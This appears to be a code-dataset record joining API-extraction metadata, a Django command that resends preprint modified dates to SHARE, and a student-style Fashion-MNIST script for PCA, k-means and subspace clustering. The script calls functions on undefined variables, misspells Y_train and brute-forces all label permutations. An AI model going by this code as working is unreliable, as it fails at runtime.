'os.path.join', (['path_dut', "(dut_foldername + '.xlsx')"], {}), "(path_dut, dut_foldername + '.xlsx')\n", (18839, 18875), False, 'import os, sys, time, platform\n'), ((7127, 7144), 'platform.system', 'platform.system', ([], {}), '()\n', (7142, 7144), False, 'import os, sys, time, platform\n'), ((7213, 7230), 'platform.system', 'platform.system', ([], {}), '()\n', (7228, 7230), False, 'import os, sys, time, platform\n'), ((10634, 10651), 'platform.system', 'platform.system', ([], {}), '()\n', (10649, 10651), False, 'import os, sys, time, platform\n'), ((10720, 10737), 'platform.system', 'platform.system', ([], {}), '()\n', (10735, 10737), 
False, 'import os, sys, time, platform\n'), ((16374, 16391), 'platform.system', 'platform.system', ([], {}), '()\n', (16389, 16391), False, 'import os, sys, time, platform\n'), ((16460, 16477), 'platform.system', 'platform.system', ([], {}), '()\n', (16475, 16477), False, 'import os, sys, time, platform\n')] |
from __future__ import unicode_literals
import logging
from django.core.management.base import BaseCommand
from django.db.models import F
from scripts import utils as script_utils
from osf.models import PreprintService
from website.preprints.tasks import on_preprint_updated
logger = logging.getLogger(__name__)
def update_share_preprint_modified_dates(dry_run=False):
for preprint in PreprintService.objects.filter(date_modified__lt=F('node__modified')):
if dry_run:
logger.info('Would have sent ' + preprint._id + ' data to SHARE')
else:
on_preprint_updated(preprint._id)
logger.info(preprint._id + ' data sent to SHARE')
class Command(BaseCommand):
"""
Send more accurate preprint modified dates to SHARE (sends updates if preprint.modified < node.modified)
"""
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
action='store_true',
dest='dry_run',
help='Say how many preprint updates would be sent to SHARE',
)
def handle(self, *args, **options):
dry_run = options.get('dry_run', False)
if not dry_run:
script_utils.add_file_logger(logger, __file__)
update_share_preprint_modified_dates(dry_run)
| [
"logging.getLogger",
"website.preprints.tasks.on_preprint_updated",
"django.db.models.F",
"scripts.utils.add_file_logger"
] | [((287, 314), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (304, 314), False, 'import logging\n'), ((442, 461), 'django.db.models.F', 'F', (['"""node__modified"""'], {}), "('node__modified')\n", (443, 461), False, 'from django.db.models import F\n'), ((588, 621), 'website.preprints.tasks.on_preprint_updated', 'on_preprint_updated', (['preprint._id'], {}), '(preprint._id)\n', (607, 621), False, 'from website.preprints.tasks import on_preprint_updated\n'), ((1245, 1291), 'scripts.utils.add_file_logger', 'script_utils.add_file_logger', (['logger', '__file__'], {}), '(logger, __file__)\n', (1273, 1291), True, 'from scripts import utils as script_utils\n')] |
import numpy as np
from sklearn.decomposition import PCA
import pandas as pd
import matplotlib.pyplot as plt
import random
import seaborn as sns
from sklearn.cluster import KMeans
from sklearn.metrics import confusion_matrix
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
import pandas.util.testing as tm
from keras.datasets import mnist
import tensorflow_datasets as tfds
import tensorflow as tf
from google.colab import files
import sys
import itertools as it
#@title ElasticNetSubspaceClustering
import warnings
import progressbar
import spams
import time
from scipy import sparse
from sklearn import cluster
from sklearn.base import BaseEstimator, ClusterMixin
from sklearn.decomposition import sparse_encode
from sklearn.linear_model import orthogonal_mp
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import normalize
from sklearn.utils import check_random_state, check_array, check_symmetric
class SelfRepresentation(BaseEstimator, ClusterMixin):
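    # Base class for self-expressive subspace clustering: a subclass computes the
    # representation matrix (each sample expressed in terms of the others), which is then
    # symmetrized into an affinity matrix and clustered with spectral clustering.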
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=20, n_jobs=1):
self.n_clusters = n_clusters
self.affinity = affinity
self.random_state = random_state
self.n_init = n_init
self.n_jobs = n_jobs
def fit(self, X, y=None):
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
time_base = time.time()
self._self_representation(X)
self.timer_self_representation_ = time.time() - time_base
self._representation_to_affinity()
self._spectral_clustering()
self.timer_time_ = time.time() - time_base
return self
def fit_self_representation(self, X, y=None):
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
time_base = time.time()
self._self_representation(X)
self.timer_self_representation_ = time.time() - time_base
return self
def _representation_to_affinity(self):
normalized_representation_matrix_ = normalize(self.representation_matrix_, 'l2')
if self.affinity == 'symmetrize':
self.affinity_matrix_ = 0.5 * (np.absolute(normalized_representation_matrix_) + np.absolute(normalized_representation_matrix_.T))
elif self.affinity == 'nearest_neighbors':
neighbors_graph = kneighbors_graph(normalized_representation_matrix_, 3,
mode='connectivity', include_self=False)
self.affinity_matrix_ = 0.5 * (neighbors_graph + neighbors_graph.T)
def _spectral_clustering(self):
affinity_matrix_ = check_symmetric(self.affinity_matrix_)
random_state = check_random_state(self.random_state)
laplacian = sparse.csgraph.laplacian(affinity_matrix_, normed=True)
_, vec = sparse.linalg.eigsh(sparse.identity(laplacian.shape[0]) - laplacian,
k=self.n_clusters, sigma=None, which='LA')
embedding = normalize(vec)
_, self.labels_, _ = cluster.k_means(embedding, self.n_clusters,
random_state=random_state, n_init=self.n_init)
def active_support_elastic_net(X, y, alpha, tau=1.0, algorithm='spams', support_init='knn',
support_size=100, maxiter=40):
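    # Active-support elastic net solver: start from a small candidate support (L2 or kNN
    # initialization), solve the elastic net restricted to that support, then grow the
    # support with the columns most coherent with the residual, repeating until the
    # objective stops improving or no new columns are added.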
n_samples = X.shape[0]
if n_samples <= support_size: # skip active support search for small scale data
supp = np.arange(n_samples, dtype=int) # this results in the following iteration to converge in 1 iteration
else:
if support_init == 'L2':
L2sol = np.linalg.solve(np.identity(y.shape[1]) * alpha + np.dot(X.T, X), y.T)
c0 = np.dot(X, L2sol)[:, 0]
supp = np.argpartition(-np.abs(c0), support_size)[0:support_size]
elif support_init == 'knn':
supp = np.argpartition(-np.abs(np.dot(y, X.T)[0]), support_size)[0:support_size]
curr_obj = float("inf")
for _ in range(maxiter):
Xs = X[supp, :]
if algorithm == 'spams':
cs = spams.lasso(np.asfortranarray(y.T), D=np.asfortranarray(Xs.T),
lambda1=tau*alpha, lambda2=(1.0-tau)*alpha)
cs = np.asarray(cs.todense()).T
else:
cs = sparse_encode(y, Xs, algorithm=algorithm, alpha=alpha)
delta = (y - np.dot(cs, Xs)) / alpha
obj = tau * np.sum(np.abs(cs[0])) + (1.0 - tau)/2.0 * np.sum(np.power(cs[0], 2.0)) + alpha/2.0 * np.sum(np.power(delta, 2.0))
if curr_obj - obj < 1.0e-10 * curr_obj:
break
curr_obj = obj
coherence = np.abs(np.dot(delta, X.T))[0]
coherence[supp] = 0
addedsupp = np.nonzero(coherence > tau + 1.0e-10)[0]
if addedsupp.size == 0: # converged
break
# Find the set of nonzero entries of cs.
activesupp = supp[np.abs(cs[0]) > 1.0e-10]
if activesupp.size > 0.8 * support_size: # this suggests that support_size is too small and needs to be increased
support_size = min([round(max([activesupp.size, support_size]) * 1.1), n_samples])
if addedsupp.size + activesupp.size > support_size:
ord = np.argpartition(-coherence[addedsupp], support_size - activesupp.size)[0:support_size - activesupp.size]
addedsupp = addedsupp[ord]
supp = np.concatenate([activesupp, addedsupp])
c = np.zeros(n_samples)
c[supp] = cs
return c
def elastic_net_subspace_clustering(X, gamma=50.0, gamma_nz=True, tau=1.0, algorithm='lasso_lars',
active_support=True, active_support_params=None, n_nonzero=50):
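    # Build the self-expressive coefficient matrix row by row: each sample is encoded as a
    # sparse (elastic net) combination of all other samples (its own column is zeroed out),
    # at most n_nonzero coefficients are kept per row, and the result is returned as a
    # scipy.sparse CSR matrix.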
if algorithm in ('lasso_lars', 'lasso_cd') and tau < 1.0 - 1.0e-10:
warnings.warn('algorithm {} cannot handle tau smaller than 1. Using tau = 1'.format(algorithm))
tau = 1.0
if active_support == True and active_support_params == None:
active_support_params = {}
n_samples = X.shape[0]
rows = np.zeros(n_samples * n_nonzero)
cols = np.zeros(n_samples * n_nonzero)
vals = np.zeros(n_samples * n_nonzero)
curr_pos = 0
for i in progressbar.progressbar(range(n_samples)):
y = X[i, :].copy().reshape(1, -1)
X[i, :] = 0
if algorithm in ('lasso_lars', 'lasso_cd', 'spams'):
if gamma_nz == True:
coh = np.delete(np.absolute(np.dot(X, y.T)), i)
alpha0 = np.amax(coh) / tau # value for which the solution is zero
alpha = alpha0 / gamma
else:
alpha = 1.0 / gamma
if active_support == True:
c = active_support_elastic_net(X, y, alpha, tau, algorithm, **active_support_params)
else:
if algorithm == 'spams':
c = spams.lasso(np.asfortranarray(y.T), D=np.asfortranarray(X.T),
lambda1=tau * alpha, lambda2=(1.0-tau) * alpha)
c = np.asarray(c.todense()).T[0]
else:
c = sparse_encode(y, X, algorithm=algorithm, alpha=alpha)[0]
else:
warnings.warn("algorithm {} not found".format(algorithm))
index = np.flatnonzero(c)
if index.size > n_nonzero:
# warnings.warn("The number of nonzero entries in sparse subspace clustering exceeds n_nonzero")
index = index[np.argsort(-np.absolute(c[index]))[0:n_nonzero]]
rows[curr_pos:curr_pos + len(index)] = i
cols[curr_pos:curr_pos + len(index)] = index
vals[curr_pos:curr_pos + len(index)] = c[index]
curr_pos += len(index)
X[i, :] = y
# affinity = sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples)) + sparse.csr_matrix((vals, (cols, rows)), shape=(n_samples, n_samples))
return sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples))
class ElasticNetSubspaceClustering(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=20, n_jobs=1, gamma=50.0, gamma_nz=True, tau=1.0,
algorithm='lasso_lars', active_support=True, active_support_params=None, n_nonzero=50):
self.gamma = gamma
self.gamma_nz = gamma_nz
self.tau = tau
self.algorithm = algorithm
self.active_support = active_support
self.active_support_params = active_support_params
self.n_nonzero = n_nonzero
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = elastic_net_subspace_clustering(X, self.gamma, self.gamma_nz,
self.tau, self.algorithm,
self.active_support, self.active_support_params,
self.n_nonzero)
def sparse_subspace_clustering_orthogonal_matching_pursuit(X, n_nonzero=10, thr=1.0e-6):
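    # OMP variant of sparse subspace clustering: each sample is greedily approximated by the
    # other samples, adding at most n_nonzero atoms or stopping once the residual energy
    # falls below a threshold derived from the sample norm.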
n_samples = X.shape[0]
rows = np.zeros(n_samples * n_nonzero, dtype = int)
cols = np.zeros(n_samples * n_nonzero, dtype = int)
vals = np.zeros(n_samples * n_nonzero)
curr_pos = 0
for i in progressbar.progressbar(range(n_samples)):
# for i in range(n_samples):
residual = X[i, :].copy() # initialize residual
supp = np.empty(shape=(0), dtype = int) # initialize support
residual_norm_thr = np.linalg.norm(X[i, :]) * thr
for t in range(n_nonzero): # for each iteration of OMP
# compute coherence between residuals and X
coherence = abs( np.matmul(residual, X.T) )
coherence[i] = 0.0
# update support
supp = np.append(supp, np.argmax(coherence))
# compute coefficients
c = np.linalg.lstsq( X[supp, :].T, X[i, :].T, rcond=None)[0]
# compute residual
residual = X[i, :] - np.matmul(c.T, X[supp, :])
# check termination
if np.sum(residual **2) < residual_norm_thr:
break
rows[curr_pos:curr_pos + len(supp)] = i
cols[curr_pos:curr_pos + len(supp)] = supp
vals[curr_pos:curr_pos + len(supp)] = c
curr_pos += len(supp)
# affinity = sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples)) + sparse.csr_matrix((vals, (cols, rows)), shape=(n_samples, n_samples))
return sparse.csr_matrix((vals, (rows, cols)), shape=(n_samples, n_samples))
class SparseSubspaceClusteringOMP(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=10, n_jobs=1, n_nonzero=10, thr=1.0e-6):
self.n_nonzero = n_nonzero
self.thr = thr
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = sparse_subspace_clustering_orthogonal_matching_pursuit(X, self.n_nonzero, self.thr)
def least_squares_subspace_clustering(X, gamma=10.0, exclude_self=False):
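    # Closed-form least-squares (ridge-regularized) self-representation; with
    # exclude_self=True the diagonal correction from the referenced paper (Theorem 6,
    # arXiv:1404.6736) is used so that no sample is represented by itself.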
n_samples, n_features = X.shape
if exclude_self == False:
if n_samples < n_features:
gram = np.matmul(X, X.T)
            return np.linalg.solve(gram + np.eye(n_samples) / gamma, gram).T
else:
tmp = np.linalg.solve(np.matmul(X.T, X) + np.eye(n_features) / gamma, X.T)
return np.matmul(X, tmp).T
else:
if n_samples < n_features:
            D = np.linalg.solve(np.matmul(X, X.T) + np.eye(n_samples) / gamma, np.eye(n_samples))
# see Theorem 6 in https://arxiv.org/pdf/1404.6736.pdf
else:
tmp = np.linalg.solve(np.matmul(X.T, X) + np.eye(n_features) / gamma, X.T)
            D = np.eye(n_samples) - np.matmul(X, tmp)
D = D / D.diagonal()[None,:]
np.fill_diagonal(D, 0.0)
return -1.0 * D.T
class LeastSquaresSubspaceClustering(SelfRepresentation):
def __init__(self, n_clusters=8, affinity='symmetrize', random_state=None, n_init=None, n_jobs=1, gamma=10.0, exclude_self=False):
self.gamma = gamma
self.exclude_self = exclude_self
SelfRepresentation.__init__(self, n_clusters, affinity, random_state, n_init, n_jobs)
def _self_representation(self, X):
self.representation_matrix_ = least_squares_subspace_clustering(X, self.gamma, self.exclude_self)
if 'google.colab' in sys.modules:
uploaded = files.upload()
#subtract the mean from every class
def preprocess_substract_mean(X, y):
labels = np.unique(y)
X_processed= X.copy()
for l in labels:
mean = np.average(X_processed[y == l], 0)
X_processed[y == l] = X_processed[y == l]- mean
return X_processed
def q_a(X,y):
#Run PCA on the dataset and plot the projection on the first 2 principal components, with each class marked in a different color/symbol
X_train_processed = preprocess_substract_mean(X, y)
pca = PCA(2) # project from 64 to 2 dimensions
projected = pca.fit_transform(X_train_processed)
#print(X_train_processed)
#print(projected.shape)
    plt.scatter(projected[:, 0], projected[:, 1],
                c=y, edgecolor='none', alpha=0.5,
                cmap=plt.cm.get_cmap('tab10', 10))
plt.xlabel('component 1')
plt.ylabel('component 2')
# plt.colorbar();
plt.show()
q_a(X_train,y_train)
def angle_calucalte(p1, p2):
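    # Angle between two vectors: arccos of the cosine similarity of the unit-normalized
    # inputs, with np.clip guarding against rounding slightly outside [-1, 1].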
p1_u = p1 / np.linalg.norm(p1)
p2_u = p2 / np.linalg.norm(p2)
return (np.arccos(np.clip(np.dot(p1_u, p2_u), -1.0, 1.0)))
def q_b(X,y):
# Sample at least 5000 pairs of points from the same class and 5000 pairs of points from different classes,
labels = np.unique(y)
n=5000
cos_theta_in_all = np.empty( shape=(0, 0) )
cos_theta_out_all = np.empty( shape=(0, 0) )
num_labels = len(labels)
rand_indx1 = random.choices(range(len(X)), k=int(n))
    rand_indx2 = list(pd.Series(rand_indx1).apply(lambda x: random.choices(y.index[y == y[x]])))
    rand_indx2 = [j[0] for j in rand_indx2]
    rand_indx3 = list(pd.Series(rand_indx1).apply(lambda x: random.choices(y.index[y != y[x]])))
    rand_indx3 = [j[0] for j in rand_indx3]
    points_in_1 = X.iloc[rand_indx1, :]
    points_in_2 = X.iloc[rand_indx2, :]
    points_out_1 = X.iloc[rand_indx3, :]
#compute the angle between every pair of points
theta_in_all = [angle_calucalte(points_in_1.iloc[i,:],points_in_2.iloc[i,:]) for i in range(len(points_in_1))]
theta_out_all = [angle_calucalte(points_in_1.iloc[i,:],points_out_1.iloc[i,:]) for i in range(len(points_in_1))]
# Plot the distribution of between-cluster angles and within cluster angles.
sns.distplot(theta_in_all,hist=True)
sns.distplot(theta_out_all,hist=True)
plt.legend(labels=['theta in', 'theta out'])
plt.show()
q_b(X_train,y_train)
l=5
pca = PCA()
pca.fit_transform(X_train)
#print(pca.explained_variance_ratio_.round(3))
np.cumsum(pca.explained_variance_ratio_).round(3)
def q_c(X,y):
# Perform PCA for each class separately, and plot for each class the proportion of variance explained vs the number of components ordered from the first PC until the last.
# What number of components would you take for further analysis?
labels = np.unique(y)
#fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
for l in labels:
pca = PCA()
pca.fit_transform(X[y==l])
exp_var_ratio = pca.explained_variance_ratio_
#ax1.plot(exp_var_ratio,label=f'class {l}')
ax2.plot(np.cumsum(pca.explained_variance_ratio_),label=f'class {l}')
#ax1.set_title("Explained Variance per class")
ax2.set_title("Cumulated Explained Variance per class")
#ax1.legend()
ax2.legend()
#fig1.show()
fig2.show()
# Repeat but now with PCA for the entire dataset
#fig3, ax3 = plt.subplots()
fig4, ax4 = plt.subplots()
pca = PCA()
projected = pca.fit_transform(X)
exp_var_ratio = pca.explained_variance_ratio_
#x3.plot(exp_var_ratio)
ax4.plot(np.cumsum(exp_var_ratio))
#ax3.set_title("Explained Variance Global")
ax4.set_title("Cumulated Explained Variance Global")
#fig3.show()
fig4.show()
q_c(X_train,Y_train)
#What number of components would you take for further analysis?
pca = PCA(0.9)
pca.fit_transform(X_train)
print(f"The number of components necessary to explain 90% of the data is : {pca.n_components_}")
def performance_measure2(k,cluster1,cluster2):
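    # Clustering accuracy: try every permutation of the k cluster labels, count the
    # agreements via the trace of the contingency table, and return the best match rate.
    # The cost grows as k!, so this is only practical for small k (k = 10 already means
    # 3,628,800 permutations).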
data = {'cluster1': cluster1,'cluster2': cluster2}
clusters = pd.DataFrame(data, index=range(len(cluster1)))
all_per = list(it.permutations(range(k)))
accuracy_rate_all_per = np.zeros(len(all_per))
for l, per in enumerate(all_per) :
c = [i for i in range(k)]
dic = dict(zip(c,per))
clusters['premut_cluster'] = clusters['cluster2'].transform(lambda x: dic[x] if x in dic else None)
m = clusters.groupby(['cluster1','premut_cluster']).size().unstack(fill_value=0)
accuracy_rate_all_per[l]=np.trace(m)
cost_cluster = (accuracy_rate_all_per.max())/len(cluster1)
return (cost_cluster)
def performance_measure3(cluster1,cluster2):
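    # Same accuracy measure, but the optimal label matching is found with the Hungarian
    # algorithm (scipy's linear_sum_assignment) on the negated contingency table, avoiding
    # the factorial search used above.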
data = {'cluster1': cluster1,'cluster2': cluster2}
clusters = pd.DataFrame(data, index=range(len(cluster1)))
m = -1*np.array(clusters.groupby(['cluster1','cluster2']).size().unstack(fill_value=0))
    from scipy.optimize import linear_sum_assignment
    indx, per = linear_sum_assignment(m)
cost_cluster = -m[indx,per].sum()/len(clusters)
return (cost_cluster)
num_components = 85
pca =PCA(num_components)
pca_X =pca.fit_transform(X_train)
kmeans_after_PCA = KMeans(n_clusters=10).fit(pca_X)
kmeans_after_PCA.labels_
def q_d(X,y):
#Run the following algorithms on your dataset:
#For each algorithm, compute and report the clustering accuracy from eq. (6). Explain your results.
labels = np.unique(y)
K=10
#i. K-means with K = 10
kmeans = KMeans(n_clusters=K).fit(X)
    kmeans_acc = performance_measure2(K, y, kmeans.labels_)
#ii. PCA with the number of components chosen based on (c.), followed by K-means with K = 10 on the projection to the top components.
    num_components = PCA(0.9).fit(X).n_components_
    pca = PCA(num_components)
    pca_X = pca.fit_transform(X)
kmeans_after_PCA = KMeans(n_clusters=K).fit(pca_X)
kmeans_after_PCA.labels_
    kmeans_pca_acc = performance_measure2(K, y, kmeans_after_PCA.labels_)
#iii. A subspace clustering algorithm of your choice (ENsc), where you can set the number of clusters to the correct one, 10.
model_ensc = ElasticNetSubspaceClustering(n_clusters=K, algorithm='spams', gamma=500)
    ensc_acc = performance_measure2(K, y, model_ensc.fit(X).labels_)
print(f'kmeans acc is: {kmeans_acc} , pca followed by kmeans acc is : {kmeans_pca_acc}, ensc acc is {ensc_acc}')
q_d(X_train,y_train)
def main():
#X_train, y_train = load_mnist('data/fashion', kind='train')
#X_test, y_test = load_mnist('data/fashion', kind='t10k')
train_data = pd.read_csv('fashion-mnist_train.csv')
X_train = train_data.drop('label', axis=1)
y_train = train_data['label']
#X_train =X_train.astype(np.uint)
#y_train =y_train.astype(np.uint)
#X_test = X_test.astype(np.uint)
#y_test = y_test.astype(np.uint)
q_a(X_train, y_train)
q_b(X_train, y_train)
q_c(X_train, y_train)
q_d(X_train, y_train)
if __name__ == '__main__':
main()
| [
"numpy.trace",
"pandas.read_csv",
"matplotlib.pyplot.ylabel",
"sklearn.neighbors.kneighbors_graph",
"random.choices",
"numpy.linalg.norm",
"sklearn.decomposition.sparse_encode",
"numpy.arange",
"sklearn.cluster.k_means",
"seaborn.distplot",
"sklearn.decomposition.PCA",
"matplotlib.pyplot.xlabe... | [((15196, 15201), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (15199, 15201), False, 'from sklearn.decomposition import PCA\n'), ((16649, 16657), 'sklearn.decomposition.PCA', 'PCA', (['(0.9)'], {}), '(0.9)\n', (16652, 16657), False, 'from sklearn.decomposition import PCA\n'), ((17838, 17857), 'sklearn.decomposition.PCA', 'PCA', (['num_components'], {}), '(num_components)\n', (17841, 17857), False, 'from sklearn.decomposition import PCA\n'), ((5622, 5641), 'numpy.zeros', 'np.zeros', (['n_samples'], {}), '(n_samples)\n', (5630, 5641), True, 'import numpy as np\n'), ((6214, 6245), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6222, 6245), True, 'import numpy as np\n'), ((6257, 6288), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6265, 6288), True, 'import numpy as np\n'), ((6300, 6331), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (6308, 6331), True, 'import numpy as np\n'), ((8066, 8135), 'scipy.sparse.csr_matrix', 'sparse.csr_matrix', (['(vals, (rows, cols))'], {'shape': '(n_samples, n_samples)'}), '((vals, (rows, cols)), shape=(n_samples, n_samples))\n', (8083, 8135), False, 'from scipy import sparse\n'), ((9356, 9398), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {'dtype': 'int'}), '(n_samples * n_nonzero, dtype=int)\n', (9364, 9398), True, 'import numpy as np\n'), ((9412, 9454), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {'dtype': 'int'}), '(n_samples * n_nonzero, dtype=int)\n', (9420, 9454), True, 'import numpy as np\n'), ((9468, 9499), 'numpy.zeros', 'np.zeros', (['(n_samples * n_nonzero)'], {}), '(n_samples * n_nonzero)\n', (9476, 9499), True, 'import numpy as np\n'), ((10749, 10818), 'scipy.sparse.csr_matrix', 'sparse.csr_matrix', (['(vals, (rows, cols))'], {'shape': '(n_samples, n_samples)'}), '((vals, (rows, cols)), shape=(n_samples, n_samples))\n', (10766, 10818), False, 'from scipy import sparse\n'), ((12777, 12791), 'google.colab.files.upload', 'files.upload', ([], {}), '()\n', (12789, 12791), False, 'from google.colab import files\n'), ((12879, 12891), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (12888, 12891), True, 'import numpy as np\n'), ((13286, 13292), 'sklearn.decomposition.PCA', 'PCA', (['(2)'], {}), '(2)\n', (13289, 13292), False, 'from sklearn.decomposition import PCA\n'), ((13600, 13625), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""component 1"""'], {}), "('component 1')\n", (13610, 13625), True, 'import matplotlib.pyplot as plt\n'), ((13630, 13655), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""component 2"""'], {}), "('component 2')\n", (13640, 13655), True, 'import matplotlib.pyplot as plt\n'), ((13682, 13692), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (13690, 13692), True, 'import matplotlib.pyplot as plt\n'), ((14023, 14035), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (14032, 14035), True, 'import numpy as np\n'), ((14070, 14092), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 0)'}), '(shape=(0, 0))\n', (14078, 14092), True, 'import numpy as np\n'), ((14119, 14141), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 0)'}), '(shape=(0, 0))\n', (14127, 14141), True, 'import numpy as np\n'), ((15016, 15053), 'seaborn.distplot', 'sns.distplot', (['theta_in_all'], {'hist': '(True)'}), '(theta_in_all, hist=True)\n', (15028, 15053), True, 'import seaborn as sns\n'), ((15057, 15095), 'seaborn.distplot', 'sns.distplot', (['theta_out_all'], 
{'hist': '(True)'}), '(theta_out_all, hist=True)\n', (15069, 15095), True, 'import seaborn as sns\n'), ((15099, 15143), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'labels': "['theta in', 'theta out']"}), "(labels=['theta in', 'theta out'])\n", (15109, 15143), True, 'import matplotlib.pyplot as plt\n'), ((15148, 15158), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (15156, 15158), True, 'import matplotlib.pyplot as plt\n'), ((15606, 15618), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (15615, 15618), True, 'import numpy as np\n'), ((15667, 15681), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (15679, 15681), True, 'import matplotlib.pyplot as plt\n'), ((16224, 16238), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (16236, 16238), True, 'import matplotlib.pyplot as plt\n'), ((16249, 16254), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (16252, 16254), False, 'from sklearn.decomposition import PCA\n'), ((18164, 18176), 'numpy.unique', 'np.unique', (['y'], {}), '(y)\n', (18173, 18176), True, 'import numpy as np\n'), ((18522, 18541), 'sklearn.decomposition.PCA', 'PCA', (['num_components'], {}), '(num_components)\n', (18525, 18541), False, 'from sklearn.decomposition import PCA\n'), ((19330, 19368), 'pandas.read_csv', 'pd.read_csv', (['"""fashion-mnist_train.csv"""'], {}), "('fashion-mnist_train.csv')\n", (19341, 19368), True, 'import pandas as pd\n'), ((1406, 1475), 'sklearn.utils.check_array', 'check_array', (['X'], {'accept_sparse': "['csr', 'csc', 'coo']", 'dtype': 'np.float64'}), "(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)\n", (1417, 1475), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((1496, 1507), 'time.time', 'time.time', ([], {}), '()\n', (1505, 1507), False, 'import time\n'), ((1844, 1913), 'sklearn.utils.check_array', 'check_array', (['X'], {'accept_sparse': "['csr', 'csc', 'coo']", 'dtype': 'np.float64'}), "(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)\n", (1855, 1913), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((1934, 1945), 'time.time', 'time.time', ([], {}), '()\n', (1943, 1945), False, 'import time\n'), ((2175, 2219), 'sklearn.preprocessing.normalize', 'normalize', (['self.representation_matrix_', '"""l2"""'], {}), "(self.representation_matrix_, 'l2')\n", (2184, 2219), False, 'from sklearn.preprocessing import normalize\n'), ((2767, 2805), 'sklearn.utils.check_symmetric', 'check_symmetric', (['self.affinity_matrix_'], {}), '(self.affinity_matrix_)\n', (2782, 2805), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((2829, 2866), 'sklearn.utils.check_random_state', 'check_random_state', (['self.random_state'], {}), '(self.random_state)\n', (2847, 2866), False, 'from sklearn.utils import check_random_state, check_array, check_symmetric\n'), ((2896, 2951), 'scipy.sparse.csgraph.laplacian', 'sparse.csgraph.laplacian', (['affinity_matrix_'], {'normed': '(True)'}), '(affinity_matrix_, normed=True)\n', (2920, 2951), False, 'from scipy import sparse\n'), ((3139, 3153), 'sklearn.preprocessing.normalize', 'normalize', (['vec'], {}), '(vec)\n', (3148, 3153), False, 'from sklearn.preprocessing import normalize\n'), ((3183, 3277), 'sklearn.cluster.k_means', 'cluster.k_means', (['embedding', 'self.n_clusters'], {'random_state': 'random_state', 'n_init': 'self.n_init'}), '(embedding, self.n_clusters, random_state=random_state,\n n_init=self.n_init)\n', (3198, 3277), False, 'from 
sklearn import cluster\n'), ((3605, 3636), 'numpy.arange', 'np.arange', (['n_samples'], {'dtype': 'int'}), '(n_samples, dtype=int)\n', (3614, 3636), True, 'import numpy as np\n'), ((5569, 5608), 'numpy.concatenate', 'np.concatenate', (['[activesupp, addedsupp]'], {}), '([activesupp, addedsupp])\n', (5583, 5608), True, 'import numpy as np\n'), ((7447, 7464), 'numpy.flatnonzero', 'np.flatnonzero', (['c'], {}), '(c)\n', (7461, 7464), True, 'import numpy as np\n'), ((9679, 9707), 'numpy.empty', 'np.empty', ([], {'shape': '(0)', 'dtype': 'int'}), '(shape=0, dtype=int)\n', (9687, 9707), True, 'import numpy as np\n'), ((12166, 12190), 'numpy.fill_diagonal', 'np.fill_diagonal', (['D', '(0.0)'], {}), '(D, 0.0)\n', (12182, 12190), True, 'import numpy as np\n'), ((12954, 12988), 'numpy.average', 'np.average', (['X_processed[y == l]', '(0)'], {}), '(X_processed[y == l], 0)\n', (12964, 12988), True, 'import numpy as np\n'), ((13765, 13783), 'numpy.linalg.norm', 'np.linalg.norm', (['p1'], {}), '(p1)\n', (13779, 13783), True, 'import numpy as np\n'), ((13800, 13818), 'numpy.linalg.norm', 'np.linalg.norm', (['p2'], {}), '(p2)\n', (13814, 13818), True, 'import numpy as np\n'), ((15278, 15318), 'numpy.cumsum', 'np.cumsum', (['pca.explained_variance_ratio_'], {}), '(pca.explained_variance_ratio_)\n', (15287, 15318), True, 'import numpy as np\n'), ((15717, 15722), 'sklearn.decomposition.PCA', 'PCA', ([], {}), '()\n', (15720, 15722), False, 'from sklearn.decomposition import PCA\n'), ((16385, 16409), 'numpy.cumsum', 'np.cumsum', (['exp_var_ratio'], {}), '(exp_var_ratio)\n', (16394, 16409), True, 'import numpy as np\n'), ((17350, 17361), 'numpy.trace', 'np.trace', (['m'], {}), '(m)\n', (17358, 17361), True, 'import numpy as np\n'), ((17911, 17932), 'sklearn.cluster.KMeans', 'KMeans', ([], 